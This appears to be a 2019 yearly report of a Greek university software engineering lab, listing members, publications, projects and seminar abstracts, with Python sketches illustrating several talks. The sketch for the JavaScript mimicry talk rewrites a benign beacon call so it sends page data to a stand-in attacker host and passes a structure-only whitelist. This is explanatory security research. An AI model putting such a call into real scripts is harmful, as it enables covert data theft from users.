BALab yearly reports

Members

Faculty Members

Damianos Chatziantoniou

Maria Kechagia

Dimitris Mitropoulos

Panos (Panagiotis) Louridas

Diomidis Spinellis

Senior Researchers

Zoe Kotti

Vasiliki Efstathiou

Stefanos Georgiou

Thodoris Sotiropoulos

Marios Fragkoulis

Associate Researchers

Charalambos-Ioannis Mitropoulos

Konstantinos Kravvaritis

Stefanos Chaliasos

Antonios Gkortzis

Tushar Sharma

Konstantina Dritsa

Researchers

George Metaxopoulos

Theodosis Tsaklanos

Michael Loukeris

Marios Papachristou

Christos Chatzilenas

Aris Pattakos

Ioannis Batas

Efstathia Chioteli

Nikolas Doureliadis

Vitalis Salis

Overview in numbers

New Publications	Number
Monographs and Edited Volumes	0
PhD Theses	1
Journal Articles	7
Book Chapters	0
Conference Publications	12
Technical Reports	0
White Papers	0
Magazine Articles	0
Working Papers	0
Datasets	5
Total New Publications	25
Projects
New Projects	1
Ongoing Projects	1
Completed Projects	1
Members
Faculty Members	5
Senior Researchers	5
Associate Researchers	6
Researchers	10
Total Members	26
New Members	4
PhDs
Ongoing PhDs	6
Completed PhDs	1
New Seminars
New Seminars	11

New Publications

PhD Theses

Tushar Sharma. Extending maintainability analysis beyond code smells. PhD thesis, Athens University of Economics and Business, Athens, Greece, 2019.

Journal Articles

Diomidis Spinellis and Paris Avgeriou. Evolution of the Unix system architecture: an exploratory case study. IEEE Transactions on Software Engineering, 2019.

Diomidis Spinellis. How to select open source components. IEEE Computer, 52(12):103–106, December 2019.

Vitalis Salis and Diomidis Spinellis. RepoFS: file system view of Git repositories. SoftwareX, 9:288–292, January 2019.

Dimitris Mitropoulos, Panos Louridas, Michalis Polychronakis, and Angelos D. Keromytis. Defending against Web application attacks: approaches, challenges and implications. IEEE Transactions on Dependable and Secure Computing, 16(2):188–203, March 2019.

Stefanos Georgiou and Diomidis Spinellis. Energy-Delay Investigation of Remote Inter-Process Communication Technologies. Journal of Systems and Software, article 110506, December 2019.

Stefanos Georgiou, Stamatia Rizou, and Diomidis Spinellis. Software development lifecycle for energy efficiency: techniques and tools. ACM Computing Surveys, 52(4):81:1–81:33, 2019.

Marios Fragkoulis, Diomidis Spinellis, and Panos Louridas. Live interactive queries to a software application's memory profile. IET Software, 13(4):241–248, August 2019.

Conference Publications

Nikolaos Vasilakis, Nancy Pouloudi, Diomidis Spinellis, and Niki Tsouma. Enabling practices for information systems adoption in the complex context of Greek e-government. In MCIS 2018: Proceedings of the 12th Mediterranean Conference on Information Systems. September 2019.

Thodoris Sotiropoulos and Benjamin Livshits. Static analysis for asynchronous JavaScript programs. In 33rd European Conference on Object-Oriented Programming, ECOOP '19. 2019.

Tushar Sharma. How deep is the mud: fathoming architecture technical debt using Designite. In International Conference on Technical Debt, TechDebt '19. May 2019.

Marios Papachristou. Software clusterings with vector semantics and the call graph. In ACM Joint European Software Engineering Conference and Symposium on the Foundations of Software Engineering (ESEC/FSE 2019), ESEC/FSE Student Research Competition 19. Association for Computing Machinery, August 2019.

Dimitris Mitropoulos, Panos Louridas, Vitalis Salis, and Diomidis Spinellis. Time present and time past: analyzing the evolution of JavaScript code in the wild. In 16th International Conference on Mining Software Repositories: Technical Track, MSR '19. May 2019.

Charalambos Mitropoulos. Employing different program analysis methods to study bug evolution. In ACM Joint European Software Engineering Conference and Symposium on the Foundations of Software Engineering (ESEC/FSE 2019), ESEC/FSE Student Research Competition 19. August 2019.

Michail Loukeris. Efficient computing in a safe environment. In ACM Joint European Software Engineering Conference and Symposium on the Foundations of Software Engineering (ESEC/FSE 2019), ESEC/FSE Student Research Competition 19. August 2019. Student Research Competition award.

Zoe Kotti and Diomidis Spinellis. Standing on shoulders or feet?: the usage of the MSR data papers. In Proceedings of the 16th International Conference on Mining Software Repositories, MSR '19, 565–576. Piscataway, NJ, USA, 2019. IEEE Press. ACM SIGSOFT Distinguished Paper Award.

Antonios Gkortzis, Daniel Feitosa, and Diomidis Spinellis. A double-edged sword? Software reuse and potential security vulnerabilities. In Xin Peng, Apostolos Ampatzoglou, and Tanmay Bhowmik, editors, Reuse in the Big Data Era, 187–203. Cham, 2019. Springer International Publishing.

Linos Giannopoulos, Eirini Degkleri, Panayiotis Tsanakas, and Dimitris Mitropoulos. Pythia: identifying dangerous data-flows in Django-based applications. In Proceedings of the 12th Workshop on Systems Security (EuroSec '19), colocated with the 14th European Conference on Computer Systems (EuroSys '19). ACM, March 2019.

Vasiliki Efstathiou and Diomidis Spinellis. Semantic source code models using identifier embeddings. In 16th International Conference on Mining Software Repositories: Data Showcase Track, MSR '19. 2019.

Stefanos Chaliasos, George Metaxopoulos, George Argyros, and Dimitris Mitropoulos. Mime artist: bypassing whitelisting for the web with JavaScript mimicry attacks. In 24th European Symposium on Research in Computer Security, ESORICS '19, 565–585. September 2019.

Datasets

Marios Papachristou. Linux 4.21 call graphs. May 2019.

Dimitris Mitropoulos, Panos Louridas, Vitalis Salis, and Diomidis Spinellis. All Your Script Are Belong to Us: Collecting and Analyzing JavaScript Code from 10K Sites for 9 Months. March 2019.

Antonios Gkortzis, Daniel Feitosa, Paris Avgeriou, and Diomidis Spinellis. Potential security vulnerabilities in open-source reused systems. February 2019.

Vasiliki Efstathiou and Diomidis Spinellis. Source code embeddings. February 2019. https://github.com/vefstathiou/scode-ft-embeddings.

Efstathia Chioteli, Ioannis Batas, and Diomidis Spinellis. Does Unit-Tested Code Crash? A Case Study of Eclipse. January 2019.

Projects

New Projects

FASTEN - Fine-Grained Analysis of Software Ecosystems as Networks

Ongoing Projects

REA - Real Estate Analytics

Completed Projects

CROSSMINER - Developer-Centric Knowledge Mining from Large Open-Source Software Repositories

New Members

Charalambos-Ioannis Mitropoulos

George Metaxopoulos

Theodosis Tsaklanos

Michael Loukeris

Ongoing PhDs

Vaggelis Atlidakis Topic: Structure and Feedback in Cloud Service API Fuzzing

Konstantinos Kravvaritis Topic: Data and Quality Metrics of System Configuration Code

Antonios Gkortzis Topic: Secure Systems on Cloud Computing Infrastructures

Stefanos Georgiou Topic: Energy and Run-Time Performance Practices in Software Engineering

Thodoris Sotiropoulos Topic: Abstractions for software testing

Konstantina Dritsa Topic: Data Science

Completed PhDs

Tushar Sharma Topic: Software Engineering in Enterprise Cloud Applications

Seminars

Semantic Source Code Models Using Identifier Embeddings

Date: 05 April 2019
Presenter: Vasiliki Efstathiou
Abstract

The emergence of online open source repositories in recent years has led to an explosion in the volume of openly available source code, coupled with metadata that relate to a variety of software development activities. As a result, in line with recent advances in machine learning research, software maintenance activities are switching from symbolic formal methods to data-driven methods. In this context, the rich semantics hidden in source code identifiers provide opportunities for building semantic representations of code that can assist code search and reuse. To this end, we deliver distributed code representations, in the form of pretrained vector space models, for six popular programming languages, namely Java, Python, PHP, C, C++, and C#. The models are produced using fastText, a state-of-the-art library for learning word representations. Each model is trained on data from a single programming language; the code mined for producing all models amounts to over 13,000 repositories. We indicate dissimilarities between natural language and source code, as well as variations in coding conventions between the different programming languages we processed. We describe how these heterogeneities guided our data preprocessing decisions and the selection of the training parameters in the released models. Finally, we propose potential applications of the models and discuss their limitations.
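The abstract notes that coding conventions differ between languages and that this guided preprocessing. One step commonly used when training word models on code is to split compound identifiers into lowercase subtokens before training; whether the released models did exactly this is not stated here, so the helper below (`split_identifier`, `tokenize_line`, both hypothetical names) is a minimal sketch under that assumption, not the authors' pipeline.

```python
import re

# Hypothetical preprocessing helper; the released models' pipeline may differ.
# Alternatives, tried in order: an acronym followed by a capitalised word
# ("HTTP" in "HTTPResponse"), a capitalised or lowercase word, a trailing
# acronym, a run of digits.
_SUBTOKEN = re.compile(r"[A-Z]+(?=[A-Z][a-z])|[A-Z]?[a-z]+|[A-Z]+|\d+")
_IDENTIFIER = re.compile(r"[A-Za-z_$][A-Za-z0-9_$]*")


def split_identifier(identifier: str) -> list[str]:
    """Split a camelCase, PascalCase or snake_case identifier into lowercase subtokens."""
    tokens: list[str] = []
    for part in re.split(r"[_$]+", identifier):
        tokens.extend(match.lower() for match in _SUBTOKEN.findall(part))
    return tokens


def tokenize_line(line: str) -> list[str]:
    """Extract the identifiers of one line of code and split each into subtokens."""
    tokens: list[str] = []
    for identifier in _IDENTIFIER.findall(line):
        tokens.extend(split_identifier(identifier))
    return tokens


print(tokenize_line("HttpResponse resp = client.sendRequest(max_retries);"))
```

Splitting this way lets `sendRequest` and `send_request` map to the same subtokens, which is one way of smoothing over the convention differences the abstract mentions.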

Standing on Shoulders or Feet? The Usage of the MSR Data Papers

Date: 05 April 2019
Presenter: Zoe Kotti
Abstract

Introduction: The establishment of the Mining Software Repositories (MSR) Data Showcase conference track has encouraged researchers to provide more data sets as a basis for further empirical studies. Objectives: Examine the usage of the data papers published in the MSR proceedings in terms of use frequency, users, and use purpose. Methods: Data track papers were collected from the MSR Data Showcase and through the manual inspection of older MSR proceedings. The use of data papers was established through citation searching followed by reading the studies that have cited them. Data papers were then clustered based on their content, whereas their citations were classified according to the knowledge areas of the Guide to the Software Engineering Body of Knowledge. Results: We found that 65% of the data papers have been used in other studies, with a long-tail distribution in the number of citations. MSR data papers are cited less than other MSR papers. A considerable number of the citations stem from the teams that authored the data papers. Publications providing repository data and metadata are the most frequent data papers and the most often cited ones. Mobile application data papers are the least common ones, but the second most frequently cited. Conclusion: Data papers have provided the foundation for a significant number of studies, but there is room for improvement in their utilization. This can be done by setting a higher bar for their publication, by encouraging their use, and by providing incentives for the enrichment of existing data collections.

Certified Robustness to Adversarial Examples with Differential Privacy

Date: 19 April 2019
Presenter: Vaggelis Atlidakis
Abstract

Adversarial examples that fool machine learning models, particularly deep neural networks, have been a topic of intense research interest, with attacks and defenses being developed in a tight back-and-forth. Most past defenses are best effort and have been shown to be vulnerable to sophisticated attacks. Recently, a set of certified defenses has been introduced, which provide guarantees of robustness to norm-bounded attacks, but they either do not scale to large datasets or are limited in the types of models they can support. This paper presents the first certified defense that both scales to large networks and datasets (such as Google’s Inception network for ImageNet) and applies broadly to arbitrary model types. Our defense, called PixelDP, is based on a novel connection between robustness against adversarial examples and differential privacy, a cryptographically inspired formalism that provides a rigorous, generic, and flexible foundation for defense.
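As we understand the PixelDP paper, a network with an (ε, δ)-differentially-private noise layer certifies its prediction k for input x when the expected scores satisfy E[A_k(x)] > e^{2ε} · max_{i≠k} E[A_i(x)] + (1 + e^ε)·δ. The sketch below estimates the expected scores by Monte Carlo sampling and checks that condition. It is a simplification under stated assumptions: the toy model (`make_toy_model`, hypothetical) adds Gaussian noise whose scale is not calibrated to any (ε, δ), and the real system, as we understand it, compares confidence-interval bounds on the estimates rather than raw means.

```python
import math
import random
from typing import Callable, Sequence

Model = Callable[[Sequence[float]], list[float]]


def make_toy_model(weights: list[list[float]], sigma: float, seed: int = 0) -> Model:
    """Hypothetical noisy classifier: Gaussian noise on the input, then a linear
    layer and a softmax. sigma is NOT calibrated to any (epsilon, delta) here."""
    rng = random.Random(seed)

    def model(x: Sequence[float]) -> list[float]:
        noisy_x = [xi + rng.gauss(0.0, sigma) for xi in x]
        logits = [sum(w * v for w, v in zip(row, noisy_x)) for row in weights]
        top = max(logits)  # subtract the max for a numerically stable softmax
        exps = [math.exp(z - top) for z in logits]
        total = sum(exps)
        return [e / total for e in exps]

    return model


def expected_scores(model: Model, x: Sequence[float], draws: int) -> list[float]:
    """Monte Carlo estimate of E[A_i(x)] for every label i."""
    totals: list[float] = []
    for _ in range(draws):
        scores = model(x)
        if not totals:
            totals = [0.0] * len(scores)
        for i, s in enumerate(scores):
            totals[i] += s
    return [t / draws for t in totals]


def is_certified(scores: Sequence[float], epsilon: float, delta: float) -> bool:
    """Check E[A_k] > e^(2*eps) * max_{i != k} E[A_i] + (1 + e^eps) * delta for the top label k."""
    k = max(range(len(scores)), key=lambda i: scores[i])
    runner_up = max(s for i, s in enumerate(scores) if i != k)
    bound = math.exp(2 * epsilon) * runner_up + (1 + math.exp(epsilon)) * delta
    return scores[k] > bound


model = make_toy_model([[2.0, 0.0], [0.0, 2.0], [1.0, 1.0]], sigma=0.1)
scores = expected_scores(model, [1.0, 0.0], draws=500)
print(is_certified(scores, epsilon=0.1, delta=0.01))
```

The check only certifies a margin: a close runner-up label (for example scores 0.45 vs 0.40) fails it even though the prediction itself is unchanged.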

Why is your flight late? Mining airline data to assess root-causes and impact of delay propagation

Date: 15 May 2019
Presenter: Vaggelis Giannikas
Abstract

Air transportation systems are exposed to daily disruptions, which have a significant impact on operations, causing not only monetary loss but also customer dissatisfaction. Airlines operate tight schedules to maximise resource utilisation. However, the lack of sufficient buffers often results in a domino effect, where the delay of a single flight can delay many other dependent flights. Due to the complexity of air transportation systems, identifying the cause of a delay is not trivial. In this paper, we propose a framework for the automatic detection of root causes of delays and their propagation effects using historical airline data. The framework comprises (1) a delay propagation model to create a connection network, (2) a delay network algorithm to find delay networks, and (3) a community detection algorithm to identify the root causes and impact of disruptions. We test our framework on historical data of an airline and show that the airline under study is prone to delay propagation through passenger connections. Additionally, the majority of its delays are related to airport capacity, resource allocation, and passengers, and mainly originate from the hub.
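The first two framework steps can be sketched as follows, under assumptions that are ours rather than the paper's: each connection (aircraft rotation or passenger transfer) has a slack buffer, delay beyond that buffer carries over, and overlapping delays combine by `max`. For step 3 the sketch swaps in plain connected components (union-find) instead of a community detection algorithm; a flight with no delay-carrying inbound link is reported as a root cause. Flight IDs are hypothetical.

```python
from collections import defaultdict


def propagate_delays(primary, connections):
    """Propagate delays along connections.

    primary: {flight: own (primary) delay in minutes}, inserted in chronological
        order so that every inbound flight appears before its outbound flights.
    connections: (inbound, outbound, slack_minutes) tuples, where slack is the
        buffer between the inbound arrival and the outbound departure.
    Returns each flight's total delay and the connections that carried delay.
    """
    incoming = defaultdict(list)
    for inbound, outbound, slack in connections:
        incoming[outbound].append((inbound, slack))
    total, active = {}, []
    for flight, own_delay in primary.items():
        delay = own_delay
        for inbound, slack in incoming[flight]:
            carried = total[inbound] - slack  # delay not absorbed by the buffer
            if carried > 0:
                active.append((inbound, flight))
                delay = max(delay, carried)  # simplification: overlapping delays do not add up
        total[flight] = delay
    return total, active


def delay_networks(active):
    """Group delay-carrying connections into connected delay networks and report
    each network's root causes (flights with no delay-carrying inbound link)."""
    parent = {}

    def find(node):
        parent.setdefault(node, node)
        while parent[node] != node:
            parent[node] = parent[parent[node]]  # path halving
            node = parent[node]
        return node

    for inbound, outbound in active:
        parent[find(inbound)] = find(outbound)
    groups = defaultdict(set)
    for node in list(parent):
        groups[find(node)].add(node)
    delayed_by_others = {outbound for _, outbound in active}
    return [(sorted(g), sorted(g - delayed_by_others)) for g in groups.values()]


primary = {"F1": 40, "F2": 0, "F3": 0, "F4": 15, "F5": 0}
connections = [("F1", "F2", 15), ("F2", "F3", 10), ("F4", "F5", 20), ("F1", "F5", 60)]
total, active = propagate_delays(primary, connections)
print(total)
print(delay_networks(active))
```

In this toy schedule F1's 40-minute delay reaches F2 and F3, while F4's 15 minutes is absorbed by the 20-minute buffer, so only one delay network, rooted at F1, is reported.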

Biography

Dr Vaggelis Giannikas is an Associate Professor at the School of Management, University of Bath where he also directs the engineering management teaching portfolio. He is studying the development and evaluation of intelligent logistics systems with applications in manufacturing, warehousing, inventory management and airline networks. A significant part of Vaggelis's research has been conducted in collaboration with corporations in Europe, USA and China. Prior to joining the University of Bath, Vaggelis served as a research associate at the Institute for Manufacturing, University of Cambridge where he was also the associate director of the Cambridge Auto-ID lab. He holds a PhD in Operations Management and Technology from the University of Cambridge and a BSc in Management Science and Technology from the Athens University of Economics and Business.

RESTler: Stateful REST API Fuzzing

Date: 20 May 2019
Presenter: Vaggelis Atlidakis
Abstract

We introduce RESTler, the first stateful REST API fuzzer. RESTler analyzes the API specification of a cloud service and generates sequences of requests that automatically test the service through its API. RESTler generates test sequences by (1) inferring producer-consumer dependencies among request types declared in the specification (e.g., inferring that “a request B should be executed after request A” because B takes as input a resource-id x produced by A) and by (2) analyzing dynamic feedback from responses observed during prior test executions in order to generate new tests (e.g., learning that “a request C after a request sequence A;B is refused by the service” and therefore avoiding this combination in the future).

We present experimental results showing that these two techniques are necessary to thoroughly exercise a service under test while pruning the large search space of possible request sequences. We used RESTler to test GitLab, a large open-source self-hosted Git service, as well as several Microsoft Azure and Office365 cloud services. RESTler found 28 bugs in GitLab and several bugs in each of the Azure and Office365 cloud services tested so far. These bugs have been confirmed and fixed by the service owners.
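The two techniques can be illustrated with a minimal sketch: a request may extend a sequence only if every resource it consumes was produced earlier (producer-consumer inference), and a sequence the service refuses is never extended (dynamic-feedback pruning). This is not RESTler's code or API; `RequestType`, the request names, and the `send` callback standing in for real HTTP calls and response-code checks are all hypothetical.

```python
from dataclasses import dataclass
from typing import Callable


@dataclass(frozen=True)
class RequestType:
    """A request type from an API specification (hypothetical, simplified)."""
    name: str
    consumes: frozenset[str] = frozenset()  # resource ids the request needs as input
    produces: frozenset[str] = frozenset()  # resource ids the response returns


RequestSeq = tuple[RequestType, ...]


def valid_extensions(seq: RequestSeq, requests: list[RequestType]) -> list[RequestType]:
    """Producer-consumer rule: a request may follow seq only if every resource
    it consumes has been produced by an earlier request in seq."""
    available = set().union(*(r.produces for r in seq))
    return [r for r in requests if r.consumes <= available]


def generate_sequences(requests: list[RequestType], max_len: int,
                       send: Callable[[RequestSeq], bool]):
    """Breadth-first generation with feedback pruning: a sequence the service
    refuses (send returns False) is never extended."""
    frontier: list[RequestSeq] = [()]
    executed: list[RequestSeq] = []
    for _ in range(max_len):
        next_frontier = []
        for seq in frontier:
            for req in valid_extensions(seq, requests):
                candidate = seq + (req,)
                executed.append(candidate)
                if send(candidate):
                    next_frontier.append(candidate)
        frontier = next_frontier
    return executed, frontier


create_project = RequestType("create_project", produces=frozenset({"project_id"}))
create_issue = RequestType("create_issue", frozenset({"project_id"}), frozenset({"issue_id"}))
get_issue = RequestType("get_issue", consumes=frozenset({"issue_id"}))
delete_project = RequestType("delete_project", consumes=frozenset({"project_id"}))
api = [create_project, create_issue, get_issue, delete_project]


def fake_service(seq: RequestSeq) -> bool:
    # Hypothetical service rule: nothing succeeds after the project is deleted.
    return "delete_project" not in [r.name for r in seq[:-1]]


executed, survivors = generate_sequences(api, 3, fake_service)
print(len(executed), len(survivors))
```

Because `get_issue` consumes `issue_id`, it is only ever tried after `create_issue`; and the refused sequences that start with `create_project; delete_project` are dropped instead of being extended further.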

Employing Different Program Analysis Methods to Study Bug Evolution

Date: 20 June 2019
Presenter: Charalambos Mitropoulos
Abstract

The evolution of software bugs has been a well-studied topic in software engineering. We used three different program analysis tools to examine different versions of two popular sets of programming tools (GNU Binary and Core utilities), and to check whether their bugs increase or decrease over time. Each tool is based on a different approach, namely static analysis, symbolic execution, and fuzzing. In this way, we can observe potential differences in the kinds of bugs that each tool detects and examine their effectiveness. To do so, we performed a qualitative analysis of the results. Overall, our results indicate that we cannot determine whether bugs decrease or increase over time, and that the tools identify different bug types depending on the method they follow.

Quality-aware and economics-driven DevOps processes for software services

Date: 25 June 2019
Presenter: Marios Fokaefs
Abstract

Digitization has undoubtedly transformed most markets, turning traditional products and tangible commodities into services. At the centre of this transformation lies software, which is the enabler and the connector behind the adoption of new technologies and the disruption of traditional processes. However, we cannot claim that we understand how software generates value and how we can quantify this value. The first goal of this research is to study the use of software both as a product and as a tool, to identify its impact on generating value and revenue, and eventually to formalize this impact in models and processes that will guide the development and evolution of software systems according to these goals. Evolution is another challenge in the digital era for software and services alike. Thanks to technological advancements like the Internet and smart devices, an increasing portion of the population, as well as a great number of enterprises, have become interconnected with immediate access to vast amounts of information. Besides the great number of connections and the high speed of data production and consumption, this situation is also characterized by its highly dynamic nature and high volatility. Under these circumstances, software needs to be adjustable in order to constantly generate value for the company and its clients. From a technical perspective, recent advancements in Software Engineering, like DevOps and self-adaptive systems, have contributed towards adapting software to such dynamic conditions. However, profitability and continuous value generation are not always immediately considered in this setting, either as goals or as constraints. The economic impact of a software change, or the need to also adapt business and economic strategies, is assessed after the change and possibly long after it is relevant. For example, consider the extension of a mobile banking app to enable remote bill payments. Is there a way to predict the economic benefits of this feature before it is developed? How accurate will this prediction be? How fast can we roll out the new version, including the business planning? Therefore, the second goal of this research is to align the technical and economic goals of software change.

Biography

I am an Assistant Professor in the Department of Computer and Software Engineering at Polytechnique Montréal. Previously, from February 2015, I was a Postdoctoral Fellow with the Centre of Excellence for Research in Adaptive Systems at York University, Canada, working with Professor Marin Litoiu. I received my Master's and PhD in Software Engineering in January 2015 from the Department of Computing Science at the University of Alberta, Canada, under the supervision of Professor Eleni Stroulia. I also hold a BSc (2008) from the Department of Applied Informatics at the University of Macedonia, Thessaloniki, Greece, under the supervision of Professor Alexander Chatzigeorgiou.

How to improve your CI/CD process

Date: 05 July 2019
Presenter: Stefanos Georgiou
Abstract

Continuous integration and deployment (CI/CD) are part of the daily process in an industrial environment to boost productivity, reduce bugs, and automate processes. However, if not used correctly, CI/CD can take a significant amount of time to test and integrate code changes. In this presentation, we show the effort required before and after employing CI/CD practices. Additionally, we show the shortcomings of our first CI/CD pipeline and explain how we optimized it. Moreover, we demonstrate how we improved our development process by incorporating cutting-edge technologies and practices such as Bitrise, Cypress, Docker containers, and Google's Cloud Platform services.

Effective and Efficient API Misuse Detection via Exception Propagation and Search-based Testing

Date: 24 July 2019
Presenter: Maria Kechagia (joint work with Xavier Devroey, Annibale Panichella, Georgios Gousios, Arie van Deursen)
Abstract

Application Programming Interfaces (APIs) typically come with (implicit) usage constraints. Violations of these constraints (API misuses) can lead to software crashes. Even though there are several tools that can detect API misuses, most of them suffer from a very high rate of false positives. We introduce Catcher, a novel API-misuse detection approach that combines static exception propagation analysis with automatic search-based test case generation to effectively and efficiently pinpoint crash-prone API misuses in client applications. We validate Catcher against 21 Java applications, targeting misuses of the Java platform’s API. Our results indicate that Catcher is able to generate test cases that uncover 243 (unique) API misuses that result in crashes. Our empirical evaluation shows that Catcher can detect a large number of misuses (77 cases) that would remain undetected by the traditional coverage-based test case generator EvoSuite. Additionally, Catcher is on average eight times faster than EvoSuite in generating test cases for the identified misuses. Finally, we find that the majority of the exceptions triggered by Catcher are unexpected to developers, i.e., not only unhandled in the source code but also not listed in the documentation of the client applications.
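The static half of such an approach, exception propagation analysis, can be sketched as a fixed-point computation over a call graph: an exception escapes a method if the method or any callee lets it through and the method does not catch it. This is an illustrative sketch, not Catcher's implementation; the call graph and client method names are hypothetical, exception names are matched exactly (no Java subtype hierarchy), and the search-based test generation that would confirm a crash is not shown. `Integer.parseInt` and `List.get` are real Java methods that can throw `NumberFormatException` and `IndexOutOfBoundsException` respectively.

```python
def escaping_exceptions(calls, throws, catches):
    """Fixed-point propagation of exceptions that may escape each method.

    calls:   {method: [callees]}
    throws:  {method: exceptions the method throws directly}
    catches: {method: exceptions handled inside the method}
    Simplification: exception names match exactly (no subtype hierarchy).
    """
    methods = set(calls) | set(throws) | {c for callees in calls.values() for c in callees}
    escapes = {m: set() for m in methods}
    changed = True
    while changed:  # iterate until no method's escaping set grows
        changed = False
        for m in methods:
            flow = set(throws.get(m, ()))
            for callee in calls.get(m, ()):
                flow |= escapes[callee]
            flow -= catches.get(m, set())
            if flow != escapes[m]:
                escapes[m] = flow
                changed = True
    return escapes


# Hypothetical client code calling two Java platform API methods.
calls = {
    "Main.run": ["Parser.parse"],
    "Main.safeRun": ["Parser.parse"],
    "Parser.parse": ["Integer.parseInt", "List.get"],
}
throws = {
    "Integer.parseInt": {"NumberFormatException"},
    "List.get": {"IndexOutOfBoundsException"},
}
catches = {"Main.safeRun": {"NumberFormatException"}}

escapes = escaping_exceptions(calls, throws, catches)
for entry in ("Main.run", "Main.safeRun"):
    print(entry, sorted(escapes[entry]))
```

Exceptions that reach an entry point are the candidate crash-prone misuses; a test generator would then try to build inputs that actually trigger them.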

Dr. Maria Kechagia is a research fellow at CREST, UCL. Previously, she was a postdoctoral fellow at the Delft University of Technology and a member of the Software Engineering Research Group. She finished her Ph.D. in Software Engineering in the Department of Management Science and Technology, at the Athens University of Economics and Business, under the supervision of Prof. Diomidis Spinellis. Before that, she pursued her MSc in Computing (Software Engineering) at Imperial College London and her BSc in Management Science and Technology at the Athens University of Economics and Business. Her research interests lie in the areas of software engineering, software verification, crash data analytics, and programming languages. In particular, her current research focuses on combining static analysis and software testing to effectively and efficiently repair API-related bugs in software programs. Her research work has been published in leading peer-reviewed software engineering conferences and journals including ICSE, ISSTA, MSR, EMSE, and JSS.

Mime artist: Bypassing whitelisting for the Web with JavaScript mimicry attacks

Date: 13 September 2019
Presenter: Stefanos Chaliasos
Abstract

Despite numerous efforts to mitigate Cross-Site Scripting (XSS) attacks, XSS remains one of the most prevalent threats to modern web applications. Recently, a number of novel XSS patterns, based on code reuse and obfuscated payloads, were introduced to bypass different protection mechanisms such as sanitization frameworks, web application firewalls, and the Content Security Policy (CSP). Nevertheless, a class of script-whitelisting defenses that perform their checks inside the JavaScript engine of the browser remains effective against these new patterns. We have evaluated the effectiveness of whitelisting mechanisms for the web by introducing “JavaScript mimicry attacks”. The concept behind such attacks is to use slight transformations (i.e., changing the leaf values of the abstract syntax tree) of an application’s benign scripts as attack vectors for malicious purposes. Our proof-of-concept exploitations indicate that JavaScript mimicry can bypass script-whitelisting mechanisms, affecting either users (e.g., cookie stealing) or applications (e.g., cryptocurrency miner hijacking). Furthermore, we have examined the applicability of such attacks at scale by performing two studies: one based on popular application frameworks (e.g., WordPress) and the other focusing on scripts coming from Alexa’s top 20 websites. Finally, we have developed an automated method to help researchers and practitioners discover mimicry scripts in the wild. To do so, our method employs symbolic analysis based on a lightweight weakest precondition calculation.
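Why changing only AST leaf values can slip past a whitelist is easy to demonstrate when the whitelist compares script structure while tolerating differing literals. In the sketch below, Python's own `ast` module parsing a Python snippet stands in for a JavaScript parser, and the structure-only whitelist, the `send_beacon` call, and the URLs are all hypothetical; real script-whitelisting mechanisms differ in what exactly they compare.

```python
import ast


class _BlankLiterals(ast.NodeTransformer):
    """Replace every literal leaf with the same placeholder, keeping only structure."""

    def visit_Constant(self, node: ast.Constant) -> ast.AST:
        return ast.copy_location(ast.Constant(value="<leaf>"), node)


class _RewriteStrings(ast.NodeTransformer):
    """Mimicry-style transformation: change selected string leaves, nothing else."""

    def __init__(self, mapping: dict[str, str]) -> None:
        self.mapping = mapping

    def visit_Constant(self, node: ast.Constant) -> ast.AST:
        if isinstance(node.value, str) and node.value in self.mapping:
            return ast.copy_location(ast.Constant(value=self.mapping[node.value]), node)
        return node


def structure_fingerprint(source: str) -> str:
    """What a hypothetical structure-only whitelist would compare."""
    return ast.dump(_BlankLiterals().visit(ast.parse(source)))


def mimic(source: str, mapping: dict[str, str]) -> str:
    """Rewrite string leaves of a benign script and print it back as source."""
    return ast.unparse(_RewriteStrings(mapping).visit(ast.parse(source)))


benign = 'send_beacon("https://stats.example.com/hit", {"page": page_id})'
mutated = mimic(benign, {"https://stats.example.com/hit": "https://evil.example.net/collect"})
whitelist = {structure_fingerprint(benign)}
print(mutated)
print(structure_fingerprint(mutated) in whitelist)
```

The mutated script sends data to a different host yet has exactly the same structural fingerprint, whereas a structurally new script such as `eval(user_input)` would be rejected.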

Engineering Dynamic Cyber-Physical Spaces

Date: 19 September 2019
Presenter: Christos Tsigkanos
Abstract

Computing and communication capabilities are increasingly being embedded into physical spaces, blurring the boundary between the computational and physical worlds; this is typically the case in modern cyber-physical or internet-of-things (IoT) systems. Conceptually, such composite environments can be abstracted into a topological model where computational and physical entities are connected in a graph structure, yielding a cyber-physical space. Like any other software-intensive system, such a space is highly dynamic and typically undergoes continuous change: it is evolving. This brings manifold challenges, as dynamics may affect, e.g., safety, security, or reliability requirements. Modelling space and its dynamics, as well as supporting formal reasoning about various properties of an evolving space, are crucial prerequisites for engineering dependable space-intensive systems, e.g., to assure requirements satisfaction or to trigger correct adaptation.

This talk will show an avenue for research that can be characterized as rethinking spatial environments from a software engineering perspective, in both design and operation aspects. Regarding design, we will see how domain descriptions can give rise to models amenable to automated analyses of dynamic behaviours on spaces populated with humans, robots, or mobile devices. Analysis amounts to assessing whether some highly space-dependent collective behaviour violates certain requirements that the overall system should exhibit. Regarding runtime, we will consider supporting analyses on the cloud on behalf of resource-constrained and spatially distributed IoT devices. We will discuss how spatial verification processes can be integrated into the service layer of an IoT-cloud architecture based on microservices, and what trade-offs emerge across different deployment options.
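Assessing whether a space-dependent collective behaviour can violate a requirement is, at its simplest, a reachability question over the states of the topological model. The sketch below uses plain explicit-state breadth-first search, which is not necessarily the formalism used in the talk: the building graph, the two agents (a visitor and a robot), and the requirement "the visitor never enters the server room" are hypothetical. It returns the shortest counterexample trace, or `None` if the requirement holds.

```python
from collections import deque
from typing import Callable, Optional

State = tuple[str, ...]  # location of each agent, e.g. (visitor, robot)


def find_violation(adjacency: dict[str, list[str]], initial: State,
                   is_bad: Callable[[State], bool]) -> Optional[list[State]]:
    """Explicit-state reachability: explore every joint placement reachable when
    one agent moves to an adjacent location per step, and return the shortest
    trace to a state violating the requirement (or None if none is reachable)."""
    parent: dict[State, Optional[State]] = {initial: None}
    queue = deque([initial])
    while queue:
        state = queue.popleft()
        if is_bad(state):
            trace = []
            node: Optional[State] = state
            while node is not None:  # walk back to the initial state
                trace.append(node)
                node = parent[node]
            return trace[::-1]
        for i, location in enumerate(state):
            for nxt in adjacency[location]:
                successor = state[:i] + (nxt,) + state[i + 1:]
                if successor not in parent:
                    parent[successor] = state
                    queue.append(successor)
    return None


# Hypothetical building: the visitor must never reach the server room.
building = {
    "lobby": ["corridor"],
    "corridor": ["lobby", "lab"],
    "lab": ["corridor", "server_room"],
    "server_room": ["lab"],
}
trace = find_violation(building, ("lobby", "lab"), lambda s: s[0] == "server_room")
print(trace)
```

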